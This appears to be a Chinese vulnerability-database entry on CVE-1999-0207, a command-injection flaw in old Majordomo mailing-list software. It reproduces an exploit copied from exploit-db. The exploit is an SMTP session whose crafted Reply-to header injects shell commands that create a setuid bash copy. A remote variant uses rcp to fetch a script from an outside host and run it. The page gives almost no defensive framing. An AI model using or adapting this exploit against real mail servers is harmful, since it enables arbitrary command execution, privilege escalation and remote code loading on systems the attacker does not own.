Majordomo邮件列表管理软件远程执行任意命令漏洞

19次阅读
没有评论

Majordomo邮件列表管理软件远程执行任意命令漏洞

漏洞ID 1105240 漏洞类型 未知
发布时间 1994-06-06 更新时间 2005-10-12
Majordomo邮件列表管理软件远程执行任意命令漏洞CVE编号 CVE-1999-0207
Majordomo邮件列表管理软件远程执行任意命令漏洞CNNVD-ID CNNVD-199406-003
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20597
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199406-003
|漏洞详情
Majordomo是一个流行的用Perl实现的(majordomo.pl)处理邮件列表的软件。1.94.3版本以下的Majordomo对邮件地址未做充分过滤,远程攻击者通过构造特殊的邮件地址可以在服务器上以Majordomo用户的权限执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/2310/info

Majordomo is a perl-based Internet e-mail list server. Versions prior to 1.91 are vulnerable to an attack whereby specially crafted e-mail headers are incorrectly processed, yielding the ability to execute arbitrary commands with the privileges of Majordomo. This is possible only when "advertise" or "noadvertise" directives are specified in the configuration files. 

Local exploit:
--exploit--
telnet localhost 25

helo localhost
mail from: user
rcpt to: majordomo (or whatever the name of the majordomo user is)
data
From: user
To: majordomo
Reply-to: a~.`/bin/cp${IFS}/bin/bash${IFS}/tmp/lord&&/bin/chmod${IFS}4777${IFS}/tmp/lord`.q~a/ad=cucu/c=blu\@kappa.ro

LISTS
.
quit
--end of exploit --

For the remote users, change the Reply-to field to something like:

Reply-to: a~.`/usr/bin/rcp${IFS}[email protected]:script${IFS}/tmp/script&&source${IFS}/tmp/script`.q~a/ad=cucu/c=blu\@kappa.ro
|参考资料
VulnerablesoftwareandversionsConfiguration1OR*cpe:/a:great_circle_associates:majordomo:1.90*cpe:/a:great_circle_associates:majordomo:1.91*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0207

相关推荐: Dada Mail Unauthorized Mailing List Subscription Vulnerability

Dada Mail Unauthorized Mailing List Subscription Vulnerability 漏洞ID 1099068 漏洞类型 Design Error 发布时间 2003-12-15 更新时间 2003-12-15 CVE编…

正文完
 0